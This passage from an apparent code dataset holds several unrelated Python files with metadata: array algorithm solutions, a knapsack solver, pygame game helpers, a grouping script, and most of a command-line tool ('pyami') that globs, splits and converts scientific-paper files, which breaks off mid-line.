input(\"What's their name?: \")\n if 2 <= len(name) <= 15:\n return name\n else:\n print(\"Invalid input please try again\")\n\n\ndef name_message():\n name = input(\"What's your name?: \")\n return (f\"Hello {name}. Welcome to the Markbook Program.\")\n\n\ndef take_interger():\n number = 0\n while True:\n try:\n number = int(input(\"Input an interger: \"))\n except ValueError:\n print(\"Invalid input please try again.\")\n if number >= 0:\n return number\n elif number < 0:\n print(\"Invalid input please try again\")\n\n\ndef name_list(student_names, student_marks):\n for name, mark in zip(student_names, student_marks):\n print(name, mark)\n\n\ndef failing_grades(student_marks):\n fails = 0\n for mark in student_marks:\n if mark <= 50:\n fails += 1\n return (f\"{fails} student(s) are failing\")\n\ndef average(student_marks):\n y = 0\n for i in student_marks:\n y += i\n return round(y / len(student_marks),2)\n\nmain()\n","sub_path":"testredo_withtry&except.py","file_name":"testredo_withtry&except.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"91857562","text":"class ArrayQuestions():\n\n # Problem : Remove Duplicates from Sorted Array\n # Time Complexity : O(n)\n # Space Complexity : O(1)\n def remove_duplicates(self, nums):\n if (len(nums) < 2):\n return len(nums)\n\n i = 0\n for j in range(1, len(nums)):\n if (nums[i] < nums[j]):\n temp = nums[j]\n nums[j] = nums[i + 1]\n nums[i + 1] = temp\n i += 1\n return i + 1\n\n # Problem : Best Time to Buy and Sell Stock II\n # Time Complexity : O(n)\n # Space Complexity : O(1)\n def max_profit(self, prices):\n if (len(prices) < 2):\n return 0\n\n profit = []\n profit.append(0)\n\n for i in range(1, len(prices)):\n if prices[i] <= prices[i - 1]:\n profit.append(profit[i - 1])\n else:\n profit.append(profit[i - 1] + (prices[i] - prices[i - 1]))\n return profit[-1]\n\n # Problem : Rotate Array\n # Time Complexity : O(n)\n # Space Complexity : O(n)\n def rotate_array(self, nums, k):\n k = k % len(nums)\n\n l = []\n i = -k\n while (i < len(nums) - k):\n l.append(nums[i])\n i += 1\n\n for i in range(0, len(nums)):\n nums[i] = l[i]\n\n # Problem : Contains Duplicate\n # Time Complexity : O(n)\n # Space Complexity : O(n)\n def contains_duplicate(self, nums):\n s = set()\n for i in nums:\n if i in s:\n return True\n else:\n s.add(i)\n return False\n\n # Problem : Single Number\n # Time Complexity : O(n)\n # Space Complexity : O(n)\n def single_number_set(self, nums):\n num_set = set()\n for i in nums:\n if i in num_set:\n num_set.remove(i)\n else:\n num_set.add(i)\n return num_set.pop()\n\n # Problem : Single Number\n # Time Complexity : O(n log n)\n # Space Complexity : O(1)\n def single_number_sort(self, nums):\n nums.sort()\n for i in range(0, len(nums), 2):\n if (i + 1 == len(nums)) or (nums[i] != nums[i + 1]):\n return nums[i]\n\n # Problem : Single Number\n # Time Complexity : O(n)\n # Space Complexity : O(1)\n def single_number_bit(self, nums):\n xor = 0\n for i in nums:\n xor = xor ^ i\n return xor\n\n # Problem : Move Zeroes (283)\n # * In-place\n # * Minimize total number of operations\n # Time Complexity : O(n^2)\n # Space Complexity : O(1)\n def move_zeroes_brute_force(self, nums):\n i = 0\n j = 1\n while (i < len(nums) and j < len(nums)):\n if (nums[i] == 0) and (nums[j] != 0):\n temp = nums[i]\n nums[i] = nums[j]\n nums[j] = temp\n i += 1\n j = i + 1\n elif (nums[i] == 0) and (nums[j] == 0):\n j += 1\n else:\n i += 1\n j += 1\n\n # Problem : 
Move Zeroes (283)\n # * In-place\n # * Minimize total number of operations\n # Time Complexity : O(n)\n # Space Complexity : O(1)\n def move_zeroes(self, nums):\n zero_index = 0\n for i in nums:\n if (i != 0):\n nums[zero_index] = i\n zero_index += 1\n for i in range(zero_index, len(nums)):\n nums[i] = 0","sub_path":"questions/leetcode/easy/array_questions.py","file_name":"array_questions.py","file_ext":"py","file_size_in_byte":3417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"424845839","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom collections import namedtuple\nItem = namedtuple(\"Item\", ['index', 'value', 'weight'])\n\ndef solve_it(input_data):\n # Modify this code to run your optimization algorithm\n\n # parse the input\n lines = input_data.split('\\n')\n\n firstLine = lines[0].split()\n item_count = int(firstLine[0])\n capacity = int(firstLine[1])\n\n items = []\n\n for i in range(1, item_count+1):\n line = lines[i]\n parts = line.split()\n items.append(Item(i-1, int(parts[0]), int(parts[1])))\n\n # show the capaicty and number of items\n print('\\n')\n print('Capacity:', str(capacity))\n print('Number of Items:', str(item_count))\n\n if capacity * item_count > 5000000000:\n # a trivial greedy algorithm for filling the knapsack\n # it takes items in-order until the knapsack is full\n print('Using greedy algorithm...')\n value = 0\n weight = 0\n taken = [0] * item_count\n\n for item in items:\n if weight + item.weight <= capacity:\n taken[item.index] = 1\n value += item.value\n weight += item.weight\n\n # prepare the solution in the specified output format\n output_data = str(value) + ' ' + str(0) + '\\n'\n output_data += ' '.join(map(str, taken))\n return output_data\n\n # a dynamic programming algorithm for filling the knapsack\n # use PyTables to store large matrix\n print('Using dynamic programming...')\n import tables as tb\n import numpy as np\n store = 'store.h5'\n filters = tb.Filters(complevel=5, complib='blosc') # use BLOSC compression\n hdf5_file = tb.open_file(store, mode='w')\n dp_table = hdf5_file.create_carray(hdf5_file.root, 'data',\n tb.Int32Atom(),\n shape=(capacity+1, item_count+1),\n filters=filters)\n\n # initialize the first column\n prev = dp_table[:, 0] = np.zeros(capacity+1)\n cur = np.empty(capacity+1)\n\n # fill the table\n for i in range(1, item_count+1):\n # when the weight of the item is greater than the capacity\n if items[i-1].weight > capacity:\n cur = prev\n # when the weight of the item is less than or equal to the capacity\n else:\n # the remain capacity cannot satisfy the item\n cur[:items[i-1].weight] = prev[:items[i-1].weight]\n # the remain capacity can satisfy the item\n cur[items[i-1].weight:] = np.maximum(prev[items[i-1].weight:], \\\n items[i-1].value+prev[:-items[i-1].weight])\n dp_table[:, i] = cur\n prev = cur\n\n # show the remaining items\n if item_count - i and (item_count - i) % 100 == 0:\n print('{} items remain...'.format(item_count-i))\n\n # close the file\n hdf5_file.close()\n\n # read the file\n read_hdf5_file = tb.open_file(store, mode='r')\n dp_table = read_hdf5_file.root.data\n\n # get the opitimal value\n value = int(dp_table[-1, -1])\n\n # initialize the taken list\n taken = [0] * item_count\n\n # trace back\n remain_weight = capacity\n for i in range(1, item_count+1):\n # when the weight between previous and current is different, the item should be taken\n if dp_table[remain_weight, -i] != dp_table[remain_weight, -i-1]:\n taken[-i] = 1\n remain_weight 
-= items[-i].weight\n\n    # close the file\n    read_hdf5_file.close()\n\n    # prepare the solution in the specified output format\n    output_data = str(value) + ' ' + str(0) + '\\n'\n    output_data += ' '.join(map(str, taken))\n    return output_data\n\nif __name__ == '__main__':\n    import sys\n    if len(sys.argv) > 1:\n        file_location = sys.argv[1].strip()\n        with open(file_location, 'r') as input_data_file:\n            input_data = input_data_file.read()\n        print(solve_it(input_data))\n    else:\n        print('This test requires an input file. Please select one from the data directory. (i.e. python solver.py ./data/ks_4_0)')\n","sub_path":"01Knapsack/old_solver/solver_PyTable.py","file_name":"solver_PyTable.py","file_ext":"py","file_size_in_byte":4114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"190609624","text":"import sys,pygame,random\nfrom fff2.bullet import Bullet\nfrom fff2.enemybullet import Ebullet\n\ndef update_screen(bullets,screen,ship,enemy,enemybullets):\n    background = pygame.image.load(\"../Resources/bg_01.png\").convert()\n    screen.blit(background, (0, 0))\n    for b1 in bullets.sprites():\n        b1.draw_bullet()\n    for b2 in enemybullets.sprites():\n        b2.draw()\n    ship.blitme()\n    ship.move()\n    enemy.blitme()\n    enemy.move()\n    bullets.update()\n    enemybullets.update()\n    pygame.display.flip()\n\ndef enebullet(screen,enemy,enemybullets):\n    i = random.randint(1,30)\n    if i==5:\n        new_enemybullet = Ebullet(screen,enemy)\n        enemybullets.add(new_enemybullet)\n\n\ndef check_keydown_events(event,ship,ai_settings, screen,bullets):\n    if event.key == pygame.K_RIGHT:\n        ship.moving_right = True\n    elif event.key == pygame.K_LEFT:\n        ship.moving_left = True\n    elif event.key == pygame.K_UP:\n        ship.moving_up = True\n    elif event.key == pygame.K_DOWN:\n        ship.moving_down = True\n    elif event.key == pygame.K_SPACE:\n        new_bullet = Bullet(ai_settings, screen, ship)\n        bullets.add(new_bullet)\n\n\ndef collisions(enemy,bullets):\n    pygame.sprite.groupcollide(enemy,bullets,True,True)\n\n\n\ndef check_keyup_events(event, ship):\n    if event.key == pygame.K_RIGHT:\n        ship.moving_right = False\n    elif event.key == pygame.K_LEFT:\n        ship.moving_left = False\n    elif event.key == pygame.K_DOWN:\n        ship.moving_down = False\n    elif event.key == pygame.K_UP:\n        ship.moving_up = False\n\n\n\ndef check_events(ai_settings, screen, ship, bullets):\n    for event in pygame.event.get():\n        if event.type == pygame.QUIT:\n            sys.exit()\n        elif event.type == pygame.KEYDOWN:\n            check_keydown_events(event,ship,ai_settings, screen,bullets)\n        elif event.type == pygame.KEYUP:\n            check_keyup_events(event, ship)\n","sub_path":"0830/fff2/game_functions.py","file_name":"game_functions.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"127199643","text":"import time\nfrom datetime import datetime\nfrom itertools import groupby\nfrom random import random, randint\n\n# Grouping algorithm\n# list1 = []\n# for i in range(10):\n#     list1.append({\"value\":randint(1, 20)})\n# list2 = sorted(list1, key=lambda a: a['value'])\n# print(list2)\n# for k, g in groupby(list2, key=lambda x: x['value'] // 5):\n#     a = list(g)\n#     print(k, a)\n#     print('{}--{}:{}'.format(k * 5, (k + 1) * 5 - 1, len(a)))\n\ngroups = []\nuniquekeys = []\nlist1 = [1,2,3,4,5,6,7,8,9]\ndata1 = sorted(list1)\nprint(data1)\nfor k, g in groupby(data1, lambda x: x // 2):\n    a = list(g)\n    b = k\n    print(list(a))\n    groups.append(list(a)) # Store group iterator as a list\n    uniquekeys.append(b)\n    
print('{}--{}:{}'.format(b * 2, (b + 1) * 2, len(a)))\nprint(groups, uniquekeys)\n\n\n# a =1604380370063\n# print(datetime.fromtimestamp(a/1000))","sub_path":"prakkkk/count_list_data.py","file_name":"count_list_data.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"147797917","text":"import logging\nimport sys\nimport os\nimport glob\nfrom file_lib import FileLib\nfrom xml_lib import XmlLib\nfrom text_lib import TextUtil\nfrom pdfreader import PdfReader\nimport pprint\n\n\nclass PyAMI:\n \"\"\" \"\"\"\n OUTFILE = \"outfile\"\n\n # flags\n APPLY = \"apply\"\n ASSERT = \"assert\"\n CHECK_URLS = \"check_urls\"\n COMBINE = \"combine\"\n CONTAINS = \"contains\"\n FILTER = \"filter\"\n GLOB = \"glob\"\n PRINT_SYMBOLS = \"print_symbols\"\n PROJ = \"proj\"\n RECURSE = \"recurse\"\n SECT = \"sect\"\n SPLIT = \"split\"\n # apply methods 1:1 input-output\n PDF2TXT = \"pdf2txt\"\n TXT2SENT = \"txt2sent\"\n XML2TXT = \"xml2txt\"\n # combine methods n:1 input-output\n CONCAT_STR = \"concat_str\"\n # split methods 1:n input-output\n TXT2PARA = \"txt2para\"\n XML2SECT = \"xml2sect\"\n # assertions\n FILE_EXISTS = \"file_exists\"\n FILE_GLOB_COUNT = \"file_glob_count\"\n # symbols to update table\n NEW_SYMBOLS = [\"proj\"]\n LOGLEVEL = \"loglevel\"\n\n logger = logging.getLogger(\"pyami\")\n def __init__(self):\n self.args = {} # args captured in here as name/value without \"-\" or \"--\"\n self.apply = []\n self.combine = None\n self.config = None\n self.current_file = None\n self.fileset = None\n self.file_dict = {}\n self.func_dict = {}\n self.result = None\n self.set_flags()\n self.symbol_ini = SymbolIni(self)\n self.set_funcs()\n self.show_symbols = False\n if self.show_symbols:\n pprint.pp(f\"SYMBOLS\\n {self.symbol_ini.symbols}\")\n\n @classmethod\n def set_logger(cls, module,\n ch_level=logging.INFO, fh_level=logging.DEBUG,\n log_file=None, logger_level=logging.WARNING):\n \"\"\"create console and stream loggers\n \n taken from https://docs.python.org/3/howto/logging-cookbook.html#logging-cookbook\n\n :param module: module to create logger for\n :param ch_level: \n :param fh_level: \n :param log_file: \n :param logger_level:\n :returns: singleton logger for module\n :rtype logger:\n\n \"\"\"\n _logger = logging.getLogger(module)\n _logger.setLevel(logger_level)\n # create file handler\n\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\n if log_file is not None:\n fh = logging.FileHandler(log_file)\n fh.setLevel(fh_level)\n fh.setFormatter(formatter)\n _logger.addHandler(fh)\n\n # create console handler\n ch = logging.StreamHandler()\n ch.setLevel(ch_level)\n ch.setFormatter(formatter)\n _logger.addHandler(ch)\n\n _logger.debug(f\"PyAMI {_logger.level}{_logger.name}\")\n return _logger\n\n def set_flags(self):\n \"\"\" \"\"\"\n self.flag_dict = {}\n self.flag_dict[self.APPLY] = None\n self.flag_dict[self.CHECK_URLS] = None\n self.flag_dict[self.COMBINE] = None\n self.flag_dict[self.PRINT_SYMBOLS] = None\n self.flag_dict[self.RECURSE] = True\n\n def set_funcs(self):\n \"\"\" \"\"\"\n # 1:1 methods\n self.func_dict[self.XML2TXT] = XmlLib.remove_all_tags\n self.func_dict[self.PDF2TXT] = PdfReader.read_and_convert\n self.func_dict[self.TXT2SENT] = TextUtil.split_into_sentences\n # 1:n methods\n\n\n def create_arg_parser(self):\n \"\"\"creates adds the arguments for pyami commandline\"\"\"\n import argparse\n parser = argparse.ArgumentParser(description='Search 
sections with dictionaries and patterns')\n # apply_choices = [self.PDF2TXT, self.TXT2SENT, self.XML2TXT]\n # print(\"ch\", apply_choices)\n parser.add_argument('--apply', nargs=\"+\",\n choices=['pdf2txt','txt2sent','xml2txt'],\n help='list of sequential transformations (1:1 map) to apply to pipeline ({self.TXT2SENT} NYI)')\n parser.add_argument('--assert', nargs=\"+\",\n help='assertions; failure gives error message (prototype)')\n parser.add_argument('--combine', nargs=1,\n help='operation to combine files into final object (e.g. concat text or CSV file')\n parser.add_argument('--config', '-c', nargs=\"*\", default=\"PYAMI\",\n help='file (e.g. ~/pyami/config.ini) with list of config file(s) or config vars')\n parser.add_argument('--debug', nargs=\"+\",\n help='debugging commands , numbers, (not formalised)')\n parser.add_argument('--demo', nargs=\"*\",\n help='simple demos (NYI). empty gives list. May need downloading corpora')\n parser.add_argument('--dict', '-d', nargs=\"+\",\n help='dictionaries to ami-search with, _help gives list')\n parser.add_argument('--filter', nargs=\"+\",\n help='expression to filter with')\n parser.add_argument('--glob', '-g', nargs=\"+\",\n help='glob files; python syntax (* and ** wildcards supported); '\n 'include alternatives in {...,...}. ')\n # parser.add_argument('--help', '-h', nargs=\"?\",\n # help='output help; (NYI) an optional arg gives level')\n parser.add_argument('--languages', nargs=\"+\", default=[\"en\"],\n help='languages (NYI)')\n parser.add_argument('--loglevel', '-l', default=\"info\",\n help='log level (NYI)')\n parser.add_argument('--maxbars', nargs=\"?\", type=int, default=25,\n help='max bars on plot (NYI)')\n parser.add_argument('--nosearch', action=\"store_true\",\n help='search (NYI)')\n parser.add_argument('--outfile', type=str,\n help='output file, normally 1. 
but (NYI) may track multiple input dirs (NYI)')\n parser.add_argument('--patt', nargs=\"+\",\n help='patterns to search with (NYI); regex may need quoting')\n parser.add_argument('--plot', action=\"store_false\",\n help='plot params (NYI)')\n parser.add_argument('--proj', '-p', nargs=\"+\",\n help='projects to search; _help will give list')\n parser.add_argument('--sect', '-s', nargs=\"+\", # default=[AmiSection.INTRO, AmiSection.RESULTS],\n help='sections to search; _help gives all(?)')\n parser.add_argument('--split', nargs=\"+\", choices=['txt2para','xml2sect'], # split fulltext.xml,\n help='split fulltext.* into paras, sections')\n return parser\n\n def run_commands(self, arglist=None):\n \"\"\"parses cmdline, runs cmds and outputs symbols\n\n :param arglist: (Default value = None)\n\n \"\"\"\n\n self.logger.info(f\"********** raw arglist {arglist}\")\n self.parse_and_run_args(arglist)\n if self.flagged(self.PRINT_SYMBOLS):\n self.symbol_ini.print_symbols()\n\n\n def parse_and_run_args(self, arglist):\n \"\"\"runs cmds and makes substitutions (${...} then runs workflow\n\n :param arglist: \n\n \"\"\"\n if arglist is None:\n arglist = []\n parser = self.create_arg_parser()\n self.args = self.extract_parsed_arg_tuples(arglist, parser)\n self.logger.info(\"ARGS: \"+str(self.args))\n self.substitute_args()\n self.set_loglevel_from_args()\n self.run_workflows()\n\n def substitute_args(self):\n \"\"\" \"\"\"\n new_items = {}\n for item in self.args.items():\n new_item = self.make_substitutions(item)\n self.logger.debug(f\"++++++++{item} ==> {new_item}\")\n new_items[new_item[0]] = new_item[1]\n self.args = new_items\n self.logger.info(f\"******** substituted ARGS {self.args}\")\n\n def run_workflows(self):\n \"\"\" \"\"\"\n # file workflow\n self.logger.warning(f\"commandline args {self.args}\")\n if self.PROJ in self.args:\n if self.SECT in self.args or self.GLOB in self.args:\n self.run_file_workflow()\n\n\n def make_substitutions(self, item):\n \"\"\"\n\n :param item: \n\n \"\"\"\n old_val = item[1]\n key = item[0]\n new_val = None\n if old_val is None:\n new_val = None\n elif isinstance(old_val, list) and len(old_val) ==1: # single string in list\n # not sure of list, is often used when only one value\n val_item = old_val[0]\n new_val = self.symbol_ini.replace_symbols_in_arg(val_item)\n elif isinstance(old_val, list):\n new_list = []\n for val_item in old_val:\n new_v = self.symbol_ini.replace_symbols_in_arg(val_item)\n new_list.append(new_v)\n self.logger.debug(f\"UPDATED LIST ITEMS: {new_list}\")\n new_val = new_list\n elif isinstance(old_val, (int, bool, float, complex)):\n new_val = old_val\n elif isinstance(old_val, str):\n if \"${\" in old_val:\n self.logger.debug(f\"Unresolved reference : {old_val}\")\n new_val = self.symbol_ini.replace_symbols_in_arg(old_val)\n else:\n new_val = old_val\n # new_items[key] = new_val\n else:\n self.logger.error(f\"{old_val} unknown arg type {type(old_val)}\")\n new_val = old_val\n self.add_selected_keys_to_symbols_ini(key, new_val)\n return (key, new_val)\n\n def extract_parsed_arg_tuples(self, arglist, parser):\n \"\"\"\n\n :param arglist: \n :param parser: \n\n \"\"\"\n parsed_args = parser.parse_args() if not arglist else parser.parse_args(arglist)\n self.logger.info(f\"PARSED_ARGS {parsed_args}\")\n args = {}\n arg_vars = vars(parsed_args)\n new_items = {}\n for item in arg_vars.items():\n new_item = self.make_substitutions(item)\n new_items[new_item[0]] = new_item[1]\n return new_items\n\n def add_selected_keys_to_symbols_ini(self, key, 
value):\n \"\"\"\n\n :param key: \n :param value: \n\n \"\"\"\n if key in self.NEW_SYMBOLS:\n self.symbol_ini.symbols[key] = value\n\n def set_loglevel_from_args(self):\n \"\"\" \"\"\"\n levels = {\n \"debug\" : logging.DEBUG,\n \"info\" : logging.INFO,\n \"warning\": logging.WARNING,\n \"error\": logging.ERROR,\n }\n\n if self.LOGLEVEL in self.args:\n loglevel = self.args[self.LOGLEVEL]\n self.logger.info(f\"loglevel {loglevel}\")\n if loglevel is not None:\n loglevel = str(loglevel)\n if loglevel is not None and loglevel.lower() in levels:\n level = levels[loglevel.lower()]\n self.logger.setLevel(level)\n\n def run_file_workflow(self):\n \"\"\" \"\"\"\n import glob\n import pathlib\n import file_lib\n self.logger.info(\"globbing\")\n if not self.args[self.PROJ]:\n self.logger.error(\"requires proj\")\n return\n self.proj = self.args[self.PROJ]\n self.logger.debug(f\"ARGS {self.args}\")\n if self.args[self.GLOB]:\n self.glob_files()\n if self.args[self.SPLIT]:\n self.split(self.args.get(self.SPLIT))\n if self.args[self.APPLY]:\n self.apply_func(self.args.get(self.APPLY))\n if self.args[self.FILTER]:\n self.filter_file()\n if self.args[self.COMBINE]:\n self.combine_files_to_object()\n if self.args[self.OUTFILE]:\n self.write_output()\n if self.args[self.ASSERT]:\n self.run_assertions()\n\n def glob_files(self):\n import glob\n glob_recurse = self.flagged(self.RECURSE)\n glob_ = self.args[self.GLOB]\n self.logger.info(f\"glob: {glob_}\")\n self.file_dict = {file: None for file in glob.glob(glob_, recursive=glob_recurse)}\n self.logger.info(f\"glob file count {len(self.file_dict)}\")\n\n def split(self, type):\n \"\"\" split fulltext.xml into sections\"\"\"\n\n for file in self.file_dict:\n suffix = FileLib.get_suffix(file)\n if \".xml\" == suffix or type==self.XML2SECT:\n self.make_xml_sections(file)\n elif \".txt\" == suffix or type == self.TXT2PARA:\n self.make_text_sections(file)\n else:\n self.logger.warning(f\"no match for suffix: {suffix}\")\n\n\n def make_xml_sections(self, file):\n xml_libx = XmlLib();\n xml_libx.logger.setLevel(logging.DEBUG)\n doc = xml_libx.read(file)\n xml_libx.make_sections(\"sections\")\n\n def make_text_sections(self, file):\n sections = []\n with open(file, \"r\", encoding=\"utf-8\") as f:\n text = f.read()\n sections = TextUtil.split_at_empty_newline(text)\n self.file_dict[file] = sections\n for sect in sections:\n print(sect)\n\n\n def apply_func(self, apply_type):\n \"\"\" \"\"\"\n self.read_file_content()\n if apply_type :\n self.logger.info(f\"apply {apply_type}\")\n func = self.func_dict[apply_type]\n if (func is None):\n self.logger.error(f\"Cannot find func for {apply_type}\")\n else:\n # apply data is stored in self.file_dict\n self.apply_to_file_content(func)\n return\n\n def normalize(self, unistr):\n import unicodedata\n print(\"NYI\")\n unicodedata.normalize('NFKC', unistr)\n pass\n\n def filter_file(self):\n filter_expr = self.args[self.FILTER]\n files = set()\n # record hits\n for file in self.file_dict:\n filter_true = self.apply_filter(file, filter_expr)\n if filter_true:\n files.add(file)\n # delete hits from dict\n for file in files:\n if file in self.file_dict:\n del self.file_dict[file]\n\n def apply_filter(self, file, filter_expr):\n found = False\n with open(file, \"r\", encoding=\"utf-8\") as f:\n content = f.read()\n if filter_expr and filter_expr.startswith(self.CONTAINS):\n search_str = filter_expr[len(self.CONTAINS) + 1:-1]\n found = search_str in content\n return found\n\n def read_file_content(self, to_str=True):\n \"\"\"read 
file content as bytes into file_dict\n        \n        :to_str: if true convert content to strings\n\n        :param to_str: (Default value = True)\n\n        \"\"\"\n        for file in self.file_dict:\n            self.logger.info(f\"reading {file}\")\n            if file.endswith(\".xml\"):\n                self.read_string_content(file, to_str)\n            elif file.endswith(\".pdf\"):\n                self.lazy_read_binary_file(file)\n            elif file.endswith(\".png\"):\n                self.read_binary_content(file)\n            elif file.endswith(\".txt\"):\n                self.read_string_content(file, to_str=False)\n            else:\n                self.logger.warning(f\"cannot read file into string {file}\")\n\n\n    def read_string_content(self, file, to_str):\n        \"\"\"reads file into string\n        Can process bytes to string\n\n        \"\"\"\n        data = None\n        with open(file, \"r\", encoding=\"utf-8\") as f:\n            try:\n                data = f.read()\n                if to_str and isinstance(data, bytes):\n                    data = data.decode(\"utf-8\")\n                self.file_dict[file] = data\n            except UnicodeDecodeError as ude:\n                self.logger.error(f\"skipped decoding error {ude}\")\n        return data\n\n    def lazy_read_binary_file(self, file):\n        self.file_dict[file] = file\n\n    def read_binary_content(self, file):\n        with open(file, \"rb\") as f:\n            try:\n                data = f.read()\n                self.file_dict[file] = data\n            except Exception as e:\n                self.logger.error(f\"skipped reading error {e}\")\n\n    def apply_to_file_content(self, func):\n        \"\"\"applies func to all string content in file_dict\n\n        :param func: \n\n        \"\"\"\n        for file in self.file_dict:\n            data = self.file_dict.get(file)\n            self.logger.warning(f\"file: {file} => {type(data)} => {func}\")\n            new_data = func(data)\n            self.file_dict[file] = new_data\n        return\n\n    def combine_files_to_object(self):\n        \"\"\" \"\"\"\n        methods = self.args.get(self.COMBINE)\n        if methods and methods == self.CONCAT_STR:\n            self.result = \"\\n\".join(self.file_dict.values())\n            # print(self.result)\n\n    def write_output(self):\n        \"\"\" \"\"\"\n        self.outfile = self.args[self.OUTFILE]\n        if self.result: # single output\n            self.write_single_result()\n\n        if self.file_dict:\n            self.write_multiple_results()\n\n    def write_multiple_results(self):\n        for file in self.file_dict:\n            data = self.file_dict[file]\n            parent = FileLib.get_parent_dir(file)\n            new_outfile = os.path.join(parent, self.outfile)\n            if not isinstance(data, list):\n                data = [data]\n            with open(new_outfile, \"w\", encoding=\"utf-8\") as f:\n                self.logger.warning(f\"wrote results {new_outfile}\")\n                # for d in data:\n                f.write(f\"{str(data)}\")\n\n    def write_single_result(self):\n        FileLib.force_write(self.outfile, self.result, overwrite=True)\n        self.logger.warning(f\"wrote results {self.outfile}\")\n\n    def run_assertions(self):\n        \"\"\" \"\"\"\n        assertions = self.args.get(self.ASSERT)\n        if assertions is not None:\n            if isinstance(assertions, str):\n                assertions = [assertions]\n            for assertion in assertions:\n                self.run_assertion(assertion)\n\n    def run_assertion(self, assertion):\n        \"\"\"\n\n        :param assertion: \n\n        \"\"\"\n        if assertion.startswith(self.FILE_EXISTS + \"(\"):\n            # file_exists(file)\n            file = assertion[len(self.FILE_EXISTS + \"(\"):-1]\n            self.assert_file_exists(file)\n        if assertion.startswith(self.FILE_GLOB_COUNT + \"(\"):\n            # file_glob_count(globex,120)\n            bits = assertion[len(self.FILE_GLOB_COUNT + \"(\"):-1].split(\",\")\n            self.assert_glob_count(bits[0], bits[1])\n\n    def assert_file_exists(self, file):\n        \"\"\"\n\n        :param file: \n\n        \"\"\"\n        if not os.path.exists(file):\n            self.assert_error(f\"file {file} does not exist\")\n        else:\n            self.logger.info(f\"File exists: {file}\")\n        pass\n\n    def assert_glob_count(self, glob_, count):\n        count = int(count)\n        files = [file 
for file in glob.glob(glob_, recursive=True)]\n self.assert_equals(len(files), count)\n\n def assert_equals(self, arg1, arg2):\n if arg1 != arg2:\n raise Exception(f\"{arg1} != {arg2}\")\n\n def assert_error(self, msg):\n \"\"\"\n\n :param msg: \n\n \"\"\"\n self.logger.error(msg)\n\n def flagged(self, flag):\n \"\"\"is flag set in flag_dict\n \n if flag is in flag_dict and not falsy return true\n :flag:\n\n :param flag: \n\n \"\"\"\n return True if self.flag_dict.get(flag) else False\n\n def test_glob(self):\n \"\"\" \"\"\"\n import os\n \"\"\"\n /Users/pm286/projects/openDiagram/physchem/resources/oil26/PMC4391421/sections/0_front/1_article-meta/17_abstract.xml\n \"\"\"\n \"\"\"\n python pyami.py\\\n --glob /Users/pm286/projects/openDiagram/physchem/resources/oil26/PMC4391421/sections/0_front/1_article-meta/17_abstract.xml\\\n --proj /Users/pm286/projects/openDiagram/physchem/resources/oil26\\\n --apply xml2txt\\\n --combine concat_str\\\n --outfile /Users/pm286/projects/openDiagram/physchem/resources/oil26/files/xml_files.txt\\\n OR\n python physchem/python/pyami.py --glob '/Users/pm286/projects/openDiagram/physchem/resources/oil26/**/*abstract.xml' --proj /Users/pm286/projects/openDiagram/physchem/resources/oil26 --apply xml2txt --combine concat_str --outfile /Users/pm286/projects/openDiagram/physchem/resources/oil26/files/xml_files.txt\n MOVING TO\n python pyami.py --proj ${oil26} --glob '**/*abstract.xml' --apply xml2txt --combine to_csv --outfile ${oil26}/files/abstracts.csv\n \n \"\"\"\n self.run_commands([\n \"--proj\", \"${oil26.p}\",\n \"--glob\", \"${proj}/**/sections/**/*abstract.xml\",\n \"--dict\", \"${eo_plant.d}\", \"${ov_country.d}\",\n \"--apply\", \"xml2txt\",\n \"--combine\", \"concat_str\",\n \"--outfile\", \"${proj}/files/shweata_10.txt\",\n \"--assert\", \"file_exists(${proj}/files/xml_files.txt)\",\n ])\n\n\n# \"--config\", # defaults to config.ini,~/pyami/config.ini if omitted\n\n# on the commandline:\n# python physchem/python/pyami.py --proj '${oil26.p}' --glob '${proj}/**/sections/**/*abstract.xml' --dict '${eo_plant.d}' '${ov_country.d}' --apply xml2txt --combine concat_str --outfile '${proj}/files/shweata_1.txt'\n# whihc expands to\n# python physchem/python/pyami.py --apply xml2txt --combine concat_str --dict '/Users/pm286/projects/CEVOpen/dictionary/eoPlant/eo_plant.xml' '/Users/pm286/dictionary/openvirus20210120/country/country.xml' --glob '/Users/pm286/projects/openDiagram/physchem/resources/oil26/**/sections/**/*abstract.xml' --outfile '/Users/pm286/projects/openDiagram/physchem/resources/oil26/files/shweata_1.txt' --proj '/Users/pm286/projects/openDiagram/physchem/resources/oil26'\n\n def test_xml2sect(self):\n from shutil import copyfile\n\n proj_dir = os.path.abspath(os.path.join(__file__, \"..\", \"tst\", \"proj\"))\n assert os.path.exists(proj_dir)\n # split into sections\n self.run_commands([\n \"--proj\", proj_dir,\n \"--glob\", \"${proj}/*/fulltext.xml\",\n \"--split\", \"xml2sect\",\n \"--assert\", \"file_glob_count(${proj}/*/sections/**/*.xml,291)\"\n ])\n\n def test_split_pdf_txt_paras(self):\n self.logger.loglevel = logging.DEBUG\n\n proj_dir = os.path.abspath(os.path.join(__file__, \"..\", \"tst\", \"proj\"))\n print(\"file\", proj_dir, os.path.exists(proj_dir))\n self.run_commands([\n \"--proj\", proj_dir,\n \"--glob\", \"${proj}/*/fulltext.pd.txt\",\n \"--split\", \"txt2para\",\n \"--outfile\", \"fulltext.pd.sc.txt\",\n \"--assert\", \"file_glob_count(${proj}/*/fulltext.pd.sc.txt,291)\"\n ])\n\n def test_split_sentences(self):\n from shutil 
